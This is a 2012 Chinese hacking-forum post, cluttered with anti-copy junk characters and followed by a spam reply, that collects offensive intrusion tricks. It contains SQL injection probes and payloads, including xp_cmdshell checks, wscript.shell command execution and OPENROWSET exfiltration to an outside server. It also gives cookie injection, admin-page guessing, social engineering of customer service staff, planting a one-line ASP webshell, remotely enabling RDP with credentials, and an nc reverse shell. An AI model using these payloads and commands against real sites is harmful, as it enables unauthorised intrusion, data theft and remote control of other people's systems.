找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3654|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关4 d' R1 n. o% p0 H9 |
# O5 Q1 ~. n3 _" g
* V7 r: M8 G  O8 r4 K2 \' V
SA点数据库分离搞法+语句:7 d7 r) j) p8 O! h2 ~) b  |# \

; l- N% l# q) ~2 U" m注射点不显错,执行下面三条语句页面都返回正常。
/ s9 ~9 a  t+ p) xand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
) V# Y5 l; L# l' j2 J6 y7 Qand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
3 s( M5 c8 V4 |/ W/ Pand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')! \& E% c) [. W
可以列目录,判断系统为2000,web与数据库分离2 y% A; E1 M6 W- L: ]2 Y
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。0 D/ |9 Y3 |7 c+ K5 R+ `3 w
在注射点上执行
$ t& G1 B) w* fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--2 t" W  c1 N+ V+ y- Y
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP8 m6 T' d" ]1 J" E
还有我用NC监听得其他端口都没有得到IP。8 m5 X/ \7 h  Y$ C9 F/ }

8 Q8 Q' e: B( i) D通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
8 m" u. s# q# P; B" H  d'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--6 c( H0 j& z2 f) {' |

% S" \0 E  O5 N;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
* E0 X6 K$ i/ o; \. W! N4 I4 a) @1 ?' e( {2 d1 w
现在就猜想是不是数据库是内网而且不能连外网。/ ~: ]5 q8 V: c7 r" Y# d* R! S

4 s0 Z; ~. f% S- a& \
1 [0 [4 W' w/ T3 u/ e# Laccess导出txt文本代码8 u- p1 [8 x/ ]; J5 ]/ u, K
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
/ ?, S2 Q1 E- q8 a! @$ K( L; B6 p! w4 ~( v

& U$ J9 X9 E- K* o& u, \+ n( O) y2 F$ |$ k5 b* b# i, u
自动跳转到指定网站代码头. L  r  M7 x* G( E& h) j3 ^9 _% y( [
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>) R! _$ B' z) F& F5 a5 B1 j

1 E+ e  z: Y% B
0 L2 ~! G) E- U% I- M入侵java or jsp站点时默认配置文件路径:
$ r, b5 M( x4 M$ R5 ~- Q9 a\web-inf\web.xml6 L# v* P2 Y& m% M, ]
tomcat下的配置文件位置:" z7 f1 P) ]( @5 H$ i
\conf\server.xml            (前面加上tomcat路径)$ G- G) z* v* X  W; K2 |
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml* t% x5 n( p8 p' c, d, }& q
% i8 Y" ^! l3 }9 x' k; d
' Z) K9 @9 a/ m8 G; [3 P1 v
5 T6 m3 A. p- L" F: _9 a1 h
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
4 l8 v. b. R8 t6 w5 H-1%235 c8 T$ T0 B& X9 ^6 s' ?! M7 g
> : T: Y: L. d2 G+ ^5 ^
<) L  I4 r" J2 Z& L3 h# C( [
1'+or+'1'='1; b6 ?9 `5 M6 Q1 o: }% X8 v
id=8%bf
; i2 c3 B8 ?: J: X2 f8 P9 W  \3 Q" w3 A0 G: Q8 i
全新注入点检测试法:
! h) ~6 n4 o  Z在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
/ [  a4 c3 f3 D4 {! e0 ?6 S
5 z  W; w7 t. J( I2 ]3 H在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
* [7 i* j# ]: a1 A. x% _
5 \* O6 b; k% T: E/ ~3 P4 ]搜索型注入判断方法:
' J* s+ j& R& g# H' F  Z% u北京%' and '1'='1' and '%'='  B& W3 y5 u6 e& m5 o! h
北京%' and '1'='2' and '%'='
) t8 r/ ^) A( ~  |5 P5 T. U; r, ?' `" ]4 x) ?( w3 @& l, s  A  h1 u' d
' e  v& I3 E( `' x2 @7 ^
COOKIES注入:
& v# L5 `$ K5 f7 g" O+ o5 O
  C# |& c3 b5 i. e. y! y  Z$ vjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
5 q0 ~( x; n( G/ B& ~* C6 p! |: R
5 `6 I+ b- O- i- @1 O2000专业版查看本地登录用户命令:0 I$ ~9 i6 G! X9 k
net config workstation
. s& U. V+ O( w3 Z" w5 a# X. ]  D: W( v" L

. R1 J# t) Q- t2003下查看ipsec配置和默认防火墙配置命令:
( Z: ^+ ~3 `* W$ Z8 z+ y; Bnetsh firewall show config
  \# T# S" `7 t" i, q) D( u6 S6 Jnetsh ipsec static show all4 n  L. W9 n: E& c: Z' Z: O' d

" {7 W) H) a0 y3 z9 N( R* q( Z不指派指定策略命令:' L* [& v/ M; u: o& h- d
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
/ R6 L  [- K. W! P& dnetsh ipsec static show policy all  显示策略名. r7 Y5 B& o' i& I2 G$ I8 b2 l

$ y5 z- _5 ?+ ~5 ^: v0 V8 E
$ g2 K0 {1 X" N( t猜管理员后台小技巧:
. k' q$ ~6 U1 V& o, k4 gadmin/left.asp
0 y/ C, f2 g4 j0 l; Q; jadmin/main.asp# r* T/ X0 I. ]
admin/top.asp
( h# C  Z3 g, j8 `+ wadmin/admin.asp " e% d; G! a( p$ `, Q
会现出菜单导航,然后迅雷下载全部链接
2 l( d4 K  s) u" l+ S1 j
0 P0 y, S- k3 \0 G! Y
! f/ F" D3 T- ~" h社会工程学:. U* S/ o3 v' O2 K
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人. {( {1 _5 S* V+ D) l3 W9 g
然后去骗客服$ C8 G7 Q6 G# V7 b- g$ b* o

+ S( W7 N, T$ S  t4 v- G8 i* t* z2 ?/ ?' V
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 2 i  |1 ?' d* I( B+ k$ ]9 C8 F
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
* F% G+ j5 p. n. k  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
/ \) A' Z6 z4 n5 t
  |6 T/ `* X) f8 {* [, o! p7 r! J$ y
( Z9 T, H8 v: i7 g, k( C
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查), R3 i! P. U) h1 g* Q& d
3 |$ n4 T9 A# k) s: _6 O) O' s) y
! N/ u' |  h% e  `$ V7 M, v# T

( K/ R. ~5 g$ }CMD加密注册表位置
3 S/ ~3 R; a* @+ X6 D( s(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor0 O# Q; A4 u; J' Q9 @& S( x
AutoRun
8 t8 |5 v9 Z: K9 A* |" R7 L, X! Z- C( }+ O1 J6 d& B# I
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
8 I7 Q. a2 X* {, U; ^3 S3 d( XAutoRun
0 |8 ~' T( R" ]
& F/ D2 \+ W, l- G+ c
$ V/ r' `, z7 |. ?( K在找注入时搜索Hidden,把他改成test
2 n! E5 Q. `& T6 b8 f6 X9 u
, a5 `) S3 ~7 E( ~% L0 \0 {+ H# Q
1 X% z' V& u4 p9 N% `( O
+ L+ q7 K6 f1 c8 f. L6 G% Omstsc /v:IP /console
+ b' p. _1 H- R3 w" u. x+ \9 T
# i4 I, L( F7 U% F# [0 {" N+ l
& i) Z. {; z. S& f0 u& q6 n一句话开3389:
) j% l9 O) v/ i# W# R, d, O* g* Z1 C( c$ f8 Y# z
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  3 H7 F- j% x7 z2 k
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
4 Y2 o% t6 p  N! e' ]
8 Y7 M% ]: [* K. k2 Q$ v# S/ X( }% o) \& ]/ w" w# r% d
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:3 s1 P3 Z8 x$ h) s% @: a+ G
Insert into admin(user,pwd) values('test','test')' ^4 E" a; }# L3 R6 U& ], a/ Z$ [6 @

# G+ P) E* T: l+ l0 N3 W( b' @8 Z5 A% k: s
NC反弹3 b& S0 b( e% w& Y
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   . Z, c" F! V0 j  G6 b" I
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
! ]2 q! C& s/ Q' T+ y5 @
# v& U4 w. M2 d% S4 `$ j6 @: E9 F) v  V, f8 G( z
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
( U1 ~0 M  S9 `/ E% W) g, p9 B7 z6 L  a! w: e
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录8 H0 e2 p3 f( L! t1 ~
例如:" g$ B0 P; B( m
subst k: d:\www\ 用d盘www目录替代k盘
; R( W: ]1 [, q5 w" fsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表